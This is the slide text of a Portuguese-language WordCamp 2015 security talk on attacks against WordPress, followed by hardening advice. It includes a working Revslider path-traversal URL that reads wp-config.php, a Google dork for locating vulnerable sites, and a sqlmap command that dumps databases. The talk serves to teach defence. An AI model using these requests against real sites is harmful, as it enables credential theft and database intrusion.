Palestra - WordCamp Belo Horizonte 2015 - WordCamp Belo Horizonte 2015 - Hackers vs WordPress – A...
-
Upload
as-zone -
Category
Technology
-
view
128 -
download
0
Transcript of Palestra - WordCamp Belo Horizonte 2015 - WordCamp Belo Horizonte 2015 - Hackers vs WordPress – A...
WordPress Vs HackersA Rebelião das Máquinas
Quem somos
Thiago Lenon
O “Canive Suiço”
=
Diversas facetas
Hackers vs WordPress
Momento “Reflexão”
“O problema com os programadores é que você nunca consegue saber o que eles estão fazendo antes de ser tarde demais.”Seymour Cray
“Quanto maior facilidade, maior a probabilidade para o desenvolvedor fazer cagada.”Pensador desconhecido
Cruel realidade
Fonte https://wappalyzer.com/categories/cms (01/06/2015)
CMS mais utilizados
Cruel realidadeVulnerabilidades por Ano
Fonte http://www.cvedetails.com/vendor/2337/Wordpress.html: (01/06/2015)
Cruel realidade
Fonte http://www.cvedetails.com/vendor/2337/Wordpress.html: (01/06/2015)
Tipos de Vulnerabilidades
Em qualquer lugar a qualquer hora
http://www.aszone.com.br/2015/06/list-of-potentially-affected-themes-wordpress/
Hackers vs WordPress
Local File Download
Exploit Revslider em ação.LFD = Local File Download, explicar o que é, o que acontece no código.● http://wordpress.local/wp-admin/admin-ajax.php?
action=revslider_show_image&img=/uploads/2015/06/wordpress-camp.jpg
● http://wordpress.local/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Local File Download
Onde está o PROBLEMA ?
Local File Download
Local File Download
Sql Injection
Sql Injection
!passo
Dork: inurl:season=*league_id=*matchday
https://google.com/search?q=inurl%3Aseason%3D*league_id%3D*match_day
Sql Injection
python sqlmap.py -u "http://localhost/wordpress/?season=1&league_id=1&match_day=1&team_id=1" --dbs
Sql Injection
Sql InjectionOnde está o PROBLEMA ?
Sql Injection
Hackers vs WordPress
Dicas para sobrevivênciaDurante desenvolvimento● Siga os padrões de criação de temas e plugins do WordPress;● Implemente testes unitários;● Pratique "Par Programming";● Pratique "Code Review";● Pentest em ciclos evolutivos;● Metodologia de desenvolvimento seguro;
Dicas para sobrevivênciaWordPress● Alteração do nome do usuário “admin” e senhas HARDCORE;● Não instalar vários plugins de segurança;● Antes de instalar pesquise sobre os plugins e temas;● Modo Debug false; ● Manter o core, temas e plugins atualizados;● Desabilitar a função de edição dos temas e plugins;● Bloquear Brute force e visualização de pastas;● Utilizar robots.txt ;● Usar as constantes no wp-config:
WP_CONTENT_DIR, WP_PLUGIN_DIR, UPLOADS, WP_AUTO_UPDATE_CORE, WP_HTTP_BLOCK_EXTERNAL
●
Dicas para sobrevivênciaInfraestrutura e Segurança● Prepração de infra;● Uso de ferramentas de vulnerabilidades;
○ Use WpScan;○ Use Accunetix;○ Use Metaexploit;
● Alterar e bloquear o wp-admin/;● Criar subdomínio para ambiente administrativo;
Obrigado !!!
@thiagodieb
@lenonleite
http://www.aszone.com.br